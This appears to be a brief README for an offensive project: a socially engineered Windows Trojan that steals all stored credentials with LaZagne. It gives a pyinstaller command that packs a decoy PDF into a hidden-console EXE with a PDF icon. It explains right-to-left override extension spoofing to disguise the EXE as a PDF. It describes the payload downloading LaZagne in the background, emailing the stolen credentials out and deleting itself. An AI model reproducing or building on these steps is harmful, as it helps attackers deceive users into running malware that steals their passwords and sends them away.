Social engineered Malware Trojan to steal all stored credentials using LaZagne.exe for Windows.
https://github.com/AlessandroZ/LaZagne
Pythom code convertion to EXE:
pyinstaller --add-data "hacking.pdf;." --onefile --noconsole --icon anypdflogo.ico malware.py
EXE to PDF extension spoofing:
Use kali tool characters right-to-left to spoof the file extension.
example: lfdp.exe -----> lexe.pdf once user opens lexe.pdf, a pdf will open as mentioned in pyinstaller and in background lazagne.exe will get downloaded, runs and send the loot in mail followed by deleting itself.